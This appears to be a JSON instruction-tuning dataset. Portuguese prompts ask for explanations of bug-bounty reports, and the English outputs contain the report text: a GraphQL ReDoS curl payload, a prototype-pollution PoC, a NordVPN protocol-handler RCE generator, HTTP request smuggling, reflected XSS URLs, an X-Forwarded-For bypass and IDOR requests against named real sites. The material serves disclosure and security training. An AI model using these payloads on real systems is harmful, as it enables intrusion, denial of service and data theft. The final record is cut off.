[ { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: ReDoS at wiki.cs.money graphQL endpoint (AND probably a kind of command injection)", "input": "", "output": "### Resumo da Vulnerabilidade\nThe endpoint /graphql has a vulnerable query operation named \"search\", that can I send a Regex malformed parameter, in order to trick the original regular expression to a regex bomb expression. \n\n+ Payload with a \"common\" search, querying the value \"AAA\":\n\n```\nquery a { \n search(q: \"AAA\", lang: \"en\") {\n _id\n weapon_id\n rarity\n collection{ _id name }\n collection_id \n \n }\n}\n```\n\nResponse:\n\n```\n{\n \"data\": {\n \"search\": [\n {\n \"_id\": \"sticker-baaa-ckstabber\",\n \"weapon_id\": null,\n \"rarity\": \"High Grade\",\n \"collection\": null,\n \"collection_id\": null\n },\n {\n \"_id\": \"sticker-ork-waaagh\",\n \"weapon_id\": null,\n \"rarity\": \"High Grade\",\n \"collection\": null,\n \"collection_id\": null\n }\n ]\n },\n \"extensions\": {\n \"tracing\": {\n \"version\": 1,\n \"startTime\": \"2020-10-07T02:07:55.251Z\",\n \"endTime\": \"2020-10-07T02:07:55.516Z\",\n \"duration\": 264270190,\n \"execution\": {\n \"resolvers\": [\n {\n \"path\": [\n \"search\"\n ],...[Resumed for convenience]\n ]\n }\n }\n }\n}\n```\n\nPay attention in this part of JSON response: \n\n```\n \"startTime\": \"2020-10-07T02:07:55.251Z\",\n \"endTime\": \"2020-10-07T02:07:55.516Z\",\n``` \n\n**It's about a instantaneously response time.**\n\nOk, now we're ready to play with this...\n\nYou can reveal the bug inserting \"\\u0000\" on \"q\" parameter, in order to display an error with part of the graph query.\n\n+ Payload A (see the error response):\n\n ```\nquery a { \n search(q: \"\\u0000)\", lang: \"en\") {\n _id\n weapon_id\n rarity\n collection{ _id name }\n collection_id \n }\n}\n ```\n\nResponse:\n\n```\n{\n \"errors\": [\n {\n \"message\": \"value (?=.*\\u0000) must not contain null bytes\",\n \"locations\": [\n {\n \"line\": 2,\n \"column\": 3\n }\n ],\n \"path\": [\n \"search\"\n ],\n \"extensions\": {\n \"code\": \"INTERNAL_SERVER_ERROR\"\n }\n }\n ],\n....[Resumed]\n ```\n\n+ Payload B (reveal that this parameter filter a value with a regex)\n\n```\nquery a { \n search(q: \"\\u0000)\", lang: \"en\") {\n _id\n weapon_id\n rarity\n collection{ _id name }\n collection_id \n }\n}\n\n```\n\n Response:\n\n ```\n{\n \"errors\": [\n {\n \"message\": \"Invalid regular expression: /(?=.*X))/: Unmatched ')'\",\n \"locations\": [\n {\n \"line\": 2,\n \"column\": 3\n }\n...[Resumed]\n\n```\n\n### Passos para Reproduzir\n1. Send a POST with the bomb payload: \n\n ````\n curl 'https://wiki.cs.money/graphql' \\ \n -H 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36' \\\n -H 'content-type: application/json' \\\n -H 'accept: */*' \\ \n --data-binary $'{\"query\":\"query a { \\\\n search(q: \\\\\"[a-zA-Z0-9]+\\\\\\\\\\\\\\\\s?)+$|^([a-zA-Z0-9.\\'\\\\\\\\\\\\\\\\w\\\\\\\\\\\\\\\\W]+\\\\\\\\\\\\\\\\s?)+$\\\\\\\\\\\\\\\\\\\\\", lang: \\\\\"en\\\\\") {\\\\n _id\\\\n weapon_id\\\\n rarity\\\\n collection{ _id name }\\\\n collection_id \\\\n \\\\n }\\\\n}\",\"variables\":null}' \\\n --compressed\n ```\n 1. Compare response times with a simple query \"AAA\" (explained above)\n\n### Impacto\nDenial of Service" }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [@firebase/util] Prototype pollution", "input": "", "output": "### Passos para Reproduzir\n- install `@firebase/util` module:\n - `npm i ``@firebase/util`\n\nRun the following poc:\n```javascript\nconst utils = require('@firebase/util');\n\nconst obj = {};\nconst source = JSON.parse('{\"__proto__\":{\"polluted\":\"yes\"}}');\nconsole.log(\"Before : \" + obj.polluted);\nutils.deepExtend({}, source);\n// utils.deepCopy(source);\nconsole.log(\"After : \" + obj.polluted);\n\n```\nOutput:\n```console\n\nBefore : undefined\nAfter : yes\n```\n{F1024346}\n\n### Impacto\nThe impact depends on the application. In some cases it is possible to achieve Denial of service (DoS), Remote Code Execution, Property Injection." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Possible RCE through Windows Custom Protocol on Windows client", "input": "", "output": "### Resumo da Vulnerabilidade\nThe NordVPN windows client application registered two custom protocols **NordVPN:** and **NordVPN.Notification:** for process communication. This makes us are able to communicate with NordVPN.exe from web browser.\nAfter looking the executable binary, I noticed the class **NordVpn.Views.ToastNotifications.ListenNotificationOpenUrl** eventually calls function **Process.Start** with controllable argument, and this notification can be triggered through custom protocol **NordVPN.Notification:**. \nSo it's possible to execute arbitrary system command from web browser.\n\n### Passos para Reproduzir\n1. Create the malicious URL, the below is my script to generate the URL, it requires importing \"Newtonsoft.Json.dll\" and \"NordVpn.Core.dll\".\n\n ```csharp\n // Program.cs\n using System;\n using System.Collections.Generic;\n using NordVpn.Core.Tools;\n using NordVpn.Core.Models.ToastNotifications.Notifications;\n using System.Diagnostics;\n\n namespace ExploitApp\n {\n class Program\n {\n static void Main(string[] args)\n {\n Dictionary arguments = new Dictionary();\n arguments[\"OpenUrl\"] = \"calc.exe\";\n NotificationActionArgs toastArgs = new NotificationActionArgs(\"\", arguments);\n String exploit = ObjectCompressor.CompressObject(toastArgs);\n Console.Write(String.Format(\"NordVPN.Notification:{0}\", exploit));\n Console.ReadKey();\n }\n }\n }\n ```\n\n 2. Add the URL into a html file with iframe tag, then serves it on HTTP server.\n\n ```html\n \n \n \n \n \n \n Exploit\n \n \n \n \n \n ```\n\n 3. Open the html file in the browser. Modern web browser may popup a window to confirm to open NordVPN.exe, if we choose \"Open NordVPN\", the command will be executed and popup a calc.exe.\n\n### Impacto\nPossible to execute system command on victim's computer and take control of the computer." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Potential HTTP Request Smuggling in nodejs", "input": "", "output": "### Passos para Reproduzir\nfor example, using haproxy to make TE-TE attack:\n\nhaproxy 1.5.3 version haproxy.cfg\nhaproxy.cfg forbid access `/flag` URI\n```\nglobal\n daemon\n maxconn 256\n\ndefaults\n mode http\n timeout connect 5000ms\n timeout client 50000ms\n timeout server 50000ms\n\nfrontend http-in\n bind *:80\n default_backend servers\n acl url_403 path_beg -i /flag\n http-request deny if url_403\n\nbackend servers\n server server1 127.0.0.1:8080 maxconn 32\n```\n\napp.js\n```\nvar express = require('express');\nvar app = express();\nvar bodyParser = require('body-parser')\n\napp.use(bodyParser())\n\napp.get('/', function (req, res) {\n res.send('Hello World!');\n});\n\napp.get('/flag', function (req, res) {\n res.send('flag is 1a2b3c4d5e6f');\n});\n\napp.post('/', function (req, res) {\n res.send('Hello World!');\n});\n\napp.listen(8080, function () {\n console.log('Example app listening on port 8080!');\n});\n```\n\nuse this http request can bypass haproxy `/flag` restrict\n```\nPOST / HTTP/1.1\nHost: 127.0.0.1\nTransfer-Encoding: chunked\nTransfer-Encoding: chunked-false\n\n1\nA\n0\n\nGET /flag HTTP/1.1\nHost: 127.0.0.1\nfoo: x\n\n\n```\n\n### Impacto\n: \nIt is possible to smuggle the request and disrupt the user experience." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Send Empty CSRF leads to log out user on [https://hosted.weblate.org/accounts/profile]", "input": "", "output": "### Passos para Reproduzir\n1- Login to your account via [Login page](https://hosted.weblate.org/accounts/login/)\n2- Click on CSRF.html that attached. \nAfter that, you will redirect to a new page an see the error, the user after clicking on this file log out from account.\n\nYou can see in the CSRF file there isn't any token, but if you place a vaid CSRF token from the source page, this attack will be successful too.\n\n{F1029164}\n\nIf you have any questions, please let me know.\n\nBest.\n\n### Impacto\nAn attacker can send the CSRF file to the victim or host it on a website. Whenever the user login in to your website click on file or link will be logged out." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: CVE-2020-14179 on https://jira.theendlessweb.com/secure/QueryComponent!Default.jspa leads to information disclosure", "input": "", "output": "### Resumo da Vulnerabilidade\nthe Jira instance on jira.theendlessweb.com is vulnerable to CVE-2020-14179 which allows remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability\n\n{F1029731}\n\n### Passos para Reproduzir\nNavigate to https://jira.theendlessweb.com/secure/QueryComponent!Default.jspa\n\n### Impacto\nAffected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [api.tumblr.com] Denial of Service by cookies manipulation", "input": "", "output": "### Resumo da Vulnerabilidade\nI have found at api.tumblr.com two parameters ```consumer_key ``` && ```consumer_secret``` allow to modify ```oa-consumer_key``` && ```oa_consumer_secret``` cookies values and property.\n\nAn attacker can send a malicious link to reset the cookies of api.tumblr.com, this lead to DOS.\nTo trigger the DOS, the target/victim account need to click a malicious link.\n\nTo restore the account, the victim need to delete all cookies on api.tumblr.com.\n\nSimilar issues : https://hackerone.com/reports/583819\n\n### Passos para Reproduzir\n1. Login at https://www.tumblr.com/\n\n2. Go to https://www.tumblr.com/oauth/apps and create a random application\n\n/!\\ if the cookies \"oa-consumer_key\" && \"oa_consumer_secret\" already exist the attack doesn't work /!\\\n\n3. After, create your application, click to this malicious following link \n```\nhttps://api.tumblr.com/console/auth?consumer_key=x;%20domain=tumblr.com;%20Max-Age=1000000000000000000000&consumer_secret=x;%20domain=tumblr.com;%20Max-Age=1000000000000000000000\n```\n\n4. Go back to https://www.tumblr.com/oauth/apps and try to connect to api.tumblr.com by clicking in \"Explore API\".\nYou will be redirected to https://www.tumblr.com/oauth/authorize?oauth_token=*&source=console and click to authorize\n\n5. loggout and login at tumblr.com\n\n6. Try again to connect to your application\n\nYou can follow me in the video POC.\n\nThanks, good bye.\n\n### Impacto\nDenial of Service and cookies manipulation" }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Able to comment/view in others support ticket at https://en.instagram-brand.com/requests/dashboard", "input": "", "output": "### Resumo da Vulnerabilidade\nI reported the vulnerability to Facebook, and they have said to report it here for the bounty.\n\n### Passos para Reproduzir\n1. Create two account User A, User B at https://en.instagram-brand.com/\n2. Apply for Instagram brand from https://en.instagram-brand.com/requests/dashboard by User A\n3. Login to user B and intercept the request\n\n4.Send a post request with cookie and other header got by intercepting user B in the below endpoint and replace comment 44799 with User A support ticket id \nPOST /wp-json/brc/v1/approval-requests/44799/comments HTTP/1.1\ntext=sure thanks&files=1597287925578-44741-%3Etest.jpg&sizes=4249\n\n### Impacto\n1) can comment in other's support ticket\n2) can view other's support ticket comments (Both Instagram as well as user's)" }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Blind XSS on image upload", "input": "", "output": "### Resumo da Vulnerabilidade\n- The CSRF vulnerability make a request for support.cs.money/upload_file; This upload_file does not have csrf token/ origin/ reference verification!\n- The XSS allows to execute JS. The payload of the XSS stay in the param 'filename' of the CSRF request.\n\n### Passos para Reproduzir\nXSS\n- use a proxy like burp suite and turn intercept on\n- upload a file to the support chat\n- change the filename to \\\">\n\n \n\n \n\n \n\n
\n\n \n\n \n\n
\n\n \n\n\n```\n3) Go to https://www.tumblr.com/settings/account and you will see the keyword ```pwd777``` in your filtered content .\n\n/!\\ You can't add a same filtered content this will generate a 400 HTTP Response code /!\\\n\nYou can follow me in the video POC.\n\nThanks, good bye.\n\n### Impacto\nAllow a attacker add filtered content to a target/victim account." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: X-Forward-For Header allows to bypass access restrictions", "input": "", "output": "### Resumo da Vulnerabilidade\nIf the \"X-Forward-For: 127.0.0.1\" header is used, it allows to bypass restrictions of the web application and access endpoints that are restricted otherwise. This allows for example to access the \"Business Owner App backend API\". The responding server thinks, he is accessed by an internal IP.\n\n### Passos para Reproduzir\nPOC1:\n```\n➜ /tmp curl -k https://biz-app.yelp.com/status \n\n{\"error\": {\"id\": \"PredicateMismatch\"}}% \n➜ /tmp curl -k https://biz-app.yelp.com/status -H \"X-Forwarded-For: 127.0.0.1\"\n\n{\"host\": \"biz--app-main--useast1-74dd77b89b-fgtdk\", \"health\": {}, \"mem_vsz\": 1111.61328125, \"mem_rss\": 410.0, \"pid\": 91941, \"uptime\": 178784.86051034927, \"version\": null}\n```\n\nPOC2:\n```\n➜ /tmp curl -k https://biz-app.yelp.com/swagger.json \n{\"error\": {\"id\": \"HTTPNotFound\"}}% \n➜ /tmp curl -k https://biz-app.yelp.com/swagger.json -H \"X-Forwarded-For: 127.0.0.1\" \n█████\n█████\n███████\n█████████\n████\n███\n████\n██████\n█████████ \n██████████ [...]\n```\n\nThe responding server thinks, it is accessed by an internal IP as can be seen in the headers:\n```\nHTTP/1.1 200 OK\nConnection: close\nserver: openresty/1.13.6.2\ncontent-type: application/json\nx-b3-sampled: 0\nx-is-internal-ip-address: true\nx-zipkin-id: 2fce61c10ade1e32\nx-routing-service: routing-main--useast1-d84b86b87-cwstn; site=biz_app\nx-mode: ro\nx-proxied: 10-65-64-83-useast1aprod\nx-extlb: 10-65-64-83-useast1aprod\nAccept-Ranges: bytes\nDate: Mon, 19 Oct 2020 12:21:19 GMT\nVia: 1.1 varnish\nX-Served-By: cache-hhn4033-HHN\nX-Cache: MISS\nX-Cache-Hits: 0\nContent-Length: 573093\n```\n\n### Impacto\nAs the attacker is seen as having an internal IP he is able to access resources which should otherwise be restricted for him." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS at https://www.glassdoor.co.in/FAQ/Microsoft-Question-FAQ200086-E1651.htm?countryRedirect=true via PATH", "input": "", "output": "### Passos para Reproduzir\n1. Navigate to https://www.glassdoor.co.in/FAQ/Microsoft-Question-FAQ200086-E1651.htm?countryRedirect=true\n 2. input the payload inside path.\n\n 3.Open this url: https://www.glassdoor.co.in/FAQ/Mic%22%3e%3cimg%20onerro%3d%3e%3cimg%20src%3dx%20onerror%3dalert%601%60%3e\nrosoft-Question-FAQ200086-E1651.htm?countryRedirect=true\n\n An alert will be popped up.\n\n### Impacto\nUsing XSS an attacker can steals the victim cookie and can also redirect him to a malicious site controlled by the attacker." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: CSRF to account takeover in https://█████/", "input": "", "output": "### Resumo da Vulnerabilidade\nThere is no protection against CSRF in changing email which lead to CSRF to account takeover on https://██████/.\n\n### Impacto\nIt is a critical issue as i was able to takeover anyone account using this attack. This vulnerability is high/critical because I was able to perform account takeover" }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Subdomains takeover of register.acronis.com, promo.acronis.com, info.acronis.com and promosandbox.acronis.com", "input": "", "output": "### Resumo da Vulnerabilidade\nThe Subdomains https://register.acronis.com, https://promo.acronis.com, https://info.acronis.com and https://promosandbox.acronis.com \nare vulnerable to takeover due to unclaimed marketo CNAME records. Anyone is able to own these subdomains at the moment.\n\nThis vulnerability is called subdomain takeover. You can read more about it here:\n\n https://blog.sweepatic.com/subdomain-takeover-principles/\n https://hackerone.com/reports/32825\n https://hackerone.com/reports/779442\t\n https://hackerone.com/reports/175070\n\n### Passos para Reproduzir\n```\nnslookup register.acronis.com\nNon-authoritative answer:\nName: sjh.mktossl.com\nAddresses:104.17.74.206\n 104.17.72.206\n 104.17.70.206\n 104.17.73.206\n 104.17.71.206\nAliases: register.acronis.com\n acronis.mktoweb.com\n\nnslookup promo.acronis.com\nNon-authoritative answer:\nName: sjh.mktossl.com\nAddresses: 104.17.71.206\n 104.17.70.206\n 104.17.74.206\n 104.17.72.206\n 104.17.73.206\nAliases: promo.acronis.com\n acronis.mktoweb.com\n\n```\n\nCNAMES entries to corresponding domains are as:\n```\npromo.acronis.com acronis.mktoweb.com\npromosandbox.acronis.com acronissandbox2.mktoweb.com\nregister.acronis.com acronis.mktoweb.com\ninfo.acronis.com \t mkto-h0084.com\n```\n\nAs register.acronis.com and promo.acronis.com pointing to CNAME record as acronis.mktoweb.com and are aliases to acronis.mktoweb.com . http://acronis.mktoweb.com/ is giving 404, page not found with message \"The requested URL was not found on this server\" which can be claimed by anyone now and would result in subdomain takeover.\n\nThe marketo document to Customize Your Landing Page URLs with a CNAME\nhttps://docs.marketo.com/display/public/DOCS/Customize+Your+Landing+Page+URLs+with+a+CNAME\n\n**As marketo is a paid service and offers account for marketing automation, I don't have a registered account. \nI wrote to Marketo technical support team and they claim the availability of listed domains as the listed domains are not in use or configured anymore.**\n\n### Impacto\nWith this, I can clearly see XSS impact in your case. Please have a look at your /v2/account request intercepted below:\nRequest:\n```\nPUT /v2/account HTTP/1.1\nHost: account.acronis.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json;charset=utf-8\nContent-Length: 702\nOrigin: https://register.acronis.com\nConnection: close\nReferer: https://account.acronis.com/\nCookie: _gcl_au=1.1.36144172.1601449011; _ga=GA1.2.1290766356.1601449012; _fbp=fb.1.1601449012432.633797135; _hjid=a7dd36be-ea53-40b1-b04e-c2a96f5ebc3c; optimizelyEndUserId=oeu1601449014822r0.42778295429069313; OptanonConsent=isIABGlobal=false&datestamp=Mon+Oct+26+2020+16%3A35%3A28+GMT%2B0530+(India+Standard+Time)&version=6.6.0&hosts=&consentId=07081eac-3ae3-443d-8451-79f5327d9351&interactionCount=1&landingPath=NotLandingPage&groups=C0001%3A1%2CC0004%3A1%2CC0003%3A1%2CC0002%3A1&AwaitingReconsent=false&geolocation=IN%3BHR; _mkto_trk=id:929-HVV-335&token:_mch-acronis.com-1601449020651-40834; OptanonAlertBoxClosed=2020-10-26T11:05:28.204Z; visid_incap_1638029=Bol4fqOiQTKxMXB55rfSHvSPlF8AAAAAQUIPAAAAAACe+MbhqMW1sJI4dpZBH6DI; _hjTLDTest=1; nlbi_1638029=ibxAVmtdEHzy/Y9u+BxnEAAAAAB308NLs7A3ARoQwyk4Cyrg; incap_ses_745_1638029=ddKxJtFthhy2IeNut8VWCvWPlF8AAAAACuwA/vpt+9dXQmj6hoxBWQ==; _gid=GA1.2.639811834.1603690260; _gac_UA-149943-47=1.1603691724.Cj0KCQjwxNT8BRD9ARIsAJ8S5xZC0_Hlxu0wgG7xA0-jU5eIi2BxoGFsRealW_kNcbHRyB_H8h3z-y0aAjFAEALw_wcB; AcronisSID.en=8a4d91ace2ecadca23dda91cdcb5abc5; AcronisUID.en=1438137573; _hjAbsoluteSessionInProgress=1; _uetsid=6d516b50174c11eb8ef2b18637bee740; _uetvid=b490e7509541648c67826dc18a0c7c46; _gat_UA-149943-47=1\n```\n\nResponse:\n```\nHTTP/1.1 200 OK\nServer: nginx\nDate: Mon, 26 Oct 2020 11:59:18 GMT\nContent-Type: application/json\nConnection: close\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\npragma: no-cache\nexpires: -1\nX-RateLimit-Limit: 100\nX-RateLimit-Remaining: 97\nAccess-Control-Allow-Origin: https://register.acronis.com\nAccess-Control-Allow-Credentials: true\nAccess-Control-Allow-Headers: Accept, Accept-Encoding, Accept-Language, Authorization, Cache-Control, Connection, DNT, Keep-Alive, If-Modified-Since, Origin, Save-Data, User-Agent, X-Requested-With, Content-Type\nAccess-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS\np3p: CP=IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\nX-Frame-Options: SAMEORIGIN\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\nX-XSS-Protection: 1; mode=block\nContent-Length: 714\n```\nSee in response below,:\n```\nAccess-Control-Allow-Origin: https://register.acronis.com\nAccess-Control-Allow-Credentials: true\n```\nAccess-Control-Allow-Credentials are true for Access-Control-Allow-Origin as *.acronis.com which makes Credentials true for all subdomains of acronis.com. Cross-Origin Resource Sharing (CORS) allows cross-domain access from all subdomains of acronis.com\n\nTherefore, by taking over listed subdomains or finding any XSS vulnerability in any of the listed subdomains can steal user information or read arbitrary data from the accounts of other users. \n\nThe Subdomain takeover allows various attacks.\n\n Malware distribution\n Phishing / Spear phishing\n XSS\n Authentication bypass\n ...\n\nList goes on and on. Since some certificate authorities (Let's Encrypt) require only domain verification, SSL certificate can be easily generated.\nAn attacker can utilize these domains for targeting the organization by fake login forms, or steal sensitive information of teams (credentials, information, etc)\n\nFIX & MITIGATION\n**You should immediately remove the CNAME entries for these domains or point it elsewhere if you don't use marketo services.**\n\nPlease let me know if more info needed or any help.\n\nBest Regards,\nAshmek" }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Attacker can generate cancelled transctions in a user's transaction history using only Steam ID", "input": "", "output": "### Resumo da Vulnerabilidade\nThe API endpoint `/create-payment` requires only the steam ID of the account to create the payment. When this endpoint is called using the `cardpay` flow, it returns a transaction ID on the Cardpay system. The attacker can access this transaction, and immediately cancel it (or pay it ;) ), which leads to a visible cancelled transaction in the cs.money user's transaction history.\n\nAlthough there is no impact to the user, they will certainly be confused.\n\n### Passos para Reproduzir\nInvoke the API call `/create-payment` as below:\n\n```\nPOST https://cs.money/create-payment HTTP/1.1\nHost: cs.money\nContent-Type: application/json;charset=UTF-8\nCookie: steamid=████████; \n\n{\"merchant\":\"cardpay\",\"amount\":10}\n```\n\nYou will get a response with a Cardpay order ID and URL:\n```\nHTTP/1.1 200 OK\n...\n{\"merchant\":\"cardpay\",\"orderId\":2034944,\"success\":true,\"url\":\"https://cardpay.com/MI/payment.html?uuid=DaG438Bda6GC13h5db1bGD01\"}\n```\n\nYou can then cancel the payment by hitting the Cardpay cancel URL:\n```\nhttps://cardpay.com/MI/cancel.html?uuid=DaG438Bda6GC13h5db1bGD01\n```\n\nThis will result in a cancelled transaction showing in the user's transaction history of the amount specified by the attacker. The attacker could repeat this numerous times until the account is banned by cs.money (this occurred on one of my test accounts).\n\n### Impacto\nConfusion for the user due to the ability to create many cancelled transactions, potentially leading to the account being banned." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [Information Disclosure] Amazon S3 Bucket of Shopify Ping (iOS) have public access of other users image", "input": "", "output": "### Passos para Reproduzir\n1. Install Shopify Ping on your phone then enable Shopify Chat for your store.\n2. Go to your Shopify Store and start chatting as a customer. ███\n3. Log in to Staff account on Shopify Ping and click on send image ████████\n4. Back to Shopify Store as Customer and inspect the website code, you will find the URL of image ██████████ https://ping-api-production.s3.us-west-2.amazonaws.com/oks██████\n5. Now visit https://ping-api-production.s3.us-west-2.amazonaws.com, you can view all images of other stores. █████████\n\n### Impacto\nUsing this Bucket access, a hacker can steal all private images of other stores and the user who shared through Shopify Ping." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: password field autocomplete enabled", "input": "", "output": "### Resumo da Vulnerabilidade\n[Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.\nThe stored credentials can be captured by an attacker who gains control over the user's computer. Further, an attacker who finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user's browser-stored credentials.]\n\n### Passos para Reproduzir\n[follow the steps]\n\n 1. [signup with the new details]\n 1. [go to login page]\n 1. [there we will see password details are automatically filled]\n\n### Impacto\nThis autocomplete password can be sniffed without user permission" }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Brave Browser potentially logs the last time a Tor window was used", "input": "", "output": "### Resumo da Vulnerabilidade\nA vulnerability in the Brave Browser allows an attacker to view the last time a Tor session was used in incognito mode. A local, on-disk attacker could read the Brave Browser's \"Local State\" json file and identify the last time a Tor session was used, affecting the confidentiality of a user's Tor session.\n\nFor example, the \"Local State\" file of a user who has recently used a Tor session would list a key value pair with a timestamp as accurate as \"13248493693576042\". This allows an attacker to fingerprint, or prove beyond reasonable doubt, that a user was using Tor at that very specific moment in time.\n\n### Passos para Reproduzir\nStart a Tor session in Brave Browser\n\n### Impacto\nViolate the confidentiality of a user's Tor session." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Default behavior of Fastifys versioned routes can be used for cache poisoning when Fastify is used in combination with a http cache / CDN", "input": "", "output": "### Passos para Reproduzir\nGiven the following Fastify server:\n\n```js\nconst app = require('fastify')();\n\napp.get('/', async () => {\n return { hello: 'world' };\n});\n\nconst start = async () => {\n await app.listen(9000)\n}\nstart();\n```\n\nRequesting this as follow:\n\n```sh\ncurl -v http://localhost:9000\n```\n\nit outputs a HTTP 200 with the expected content:\n\n```sh\n* Trying 127.0.0.1:9000...\n* TCP_NODELAY set\n* Connected to localhost (127.0.0.1) port 9000 (#0)\n> GET / HTTP/1.1\n> Host: localhost:9000\n> User-Agent: curl/7.68.0\n> Accept: */*\n> \n* Mark bundle as not supporting multiuse\n< HTTP/1.1 200 OK\n< content-type: application/json; charset=utf-8\n< content-length: 17\n< Date: Tue, 03 Nov 2020 19:21:41 GMT\n< Connection: keep-alive\n< Keep-Alive: timeout=5\n< \n* Connection #0 to host localhost left intact\n{\"hello\":\"world\"}\n```\n\nThough, if we request the same route with an `Accept-Version` header:\n\n```sh\ncurl -v -H \"Accept-version: tada\" http://localhost:9000\n```\n\nit outputs a HTTP 404:\n\n```sh\n* Trying 127.0.0.1:9000...\n* TCP_NODELAY set\n* Connected to localhost (127.0.0.1) port 9000 (#0)\n> GET / HTTP/1.1\n> Host: localhost:9000\n> User-Agent: curl/7.68.0\n> Accept: */*\n> Accept-version: tada\n> \n* Mark bundle as not supporting multiuse\n< HTTP/1.1 404 Not Found\n< content-type: application/json; charset=utf-8\n< content-length: 72\n< Date: Tue, 03 Nov 2020 19:25:09 GMT\n< Connection: keep-alive\n< Keep-Alive: timeout=5\n< \n* Connection #0 to host localhost left intact\n{\"message\":\"Route GET:/ not found\",\"error\":\"Not Found\",\"statusCode\":404}\n```\n\nWhen a http cache / CDN are in front of such a server, an attacker can use this behavior to trigger caching of a 404 page on a legal route. Ex; A default Fastly (the CDN we use) or Varnish config will result in a cached 404 page with the above setup.\n\nWhen versioned routes are in use I also think that a `Vary` http header with `Accept-Version` as a value should be added to the response. That shall prevent a http cache / CDN from caching a 404 under the same cache key as a previous response.\n\nThough; to avoid this behavior when not using version routes I think it should be possible to turn off version routes. Is there an easy way to do so? Type a boolean on the constructor? Or do one need to write a custom version parser which according to doc affect performance?\n\nIts highly debatable if this is a security issue in Fastify, though, behavior of this might be worth having a second look at. Personally I was a bit surprised that versioned routes was a default behavior. I would expect it to be an opt in instead of opt out (if its possible to opt out).\n\n### Impacto\nAn attacker can use this cache poisoning to perform an attack where fully functionally URLs are replaced with 404's." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Exposed Configuration Files at https://www.exodus.io/keybase.txt", "input": "", "output": "### Resumo da Vulnerabilidade\nUsername, uid information is present in txt file.\n\n### Passos para Reproduzir\n1. Open This link https://www.exodus.io/keybase.txt \n 2. Search for username, uid\n 3. You will get some usernames with uid.\n\n### Impacto\nThis information may help attacker in further attacks." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS in https://███████ via hidden parameter \"████████\"", "input": "", "output": "### Passos para Reproduzir\n- Use your favorite web browser\n- Go to : \n```\nhttps://███████/███████&███=TEST%22%3E%3Cscript%3Ealert(%27Reflected%20XSS%27)%3C/script%3E\n```\n\nAn XSS is triggered !\n\nThe initial page was https://█████████/█████████\n\nWith a little research, you can find a hidden parameter \"████████\" which is directly reflected in the source code **without sanitize user entries**. Then just close the tag and inject our malicious code.\n\n### Impacto\nThe damages of a reflexive XSS flaw are numerous: executing malicious javascript code, phishing, defacing ... We can also inject HTML code and mislead the user when displaying the web page.\n\nFrom [OWASP](https://owasp.org/www-community/attacks/xss/) :\n\n>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS on https://███/████via hidden parameter \"█████████\"", "input": "", "output": "### Passos para Reproduzir\n- Use your favorite web browser\n- Go to : \n```\nhttps://█████/████████&██████=XXX%22%3E%3Cscript%3Ealert(%27Reflected%20XSS%20here%27)%3C/script%3E\n```\n\nAn XSS is triggered !\n\nThe initial page was https://██████/guest/tls_sso.php\n\nWith a little research, you can find a hidden parameter \"███\" which is directly reflected in the source code **without sanitize user entries**. Then just close the tag and inject our malicious code.\n\n### Impacto\nThe damages of a reflected XSS flaw are numerous: executing malicious javascript code, phishing, defacing ... We can also inject HTML code and mislead the user when displaying the web page.\n\nFrom [OWASP](https://owasp.org/www-community/attacks/xss/) :\n\n>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Read-only application can publish/delete fleets", "input": "", "output": 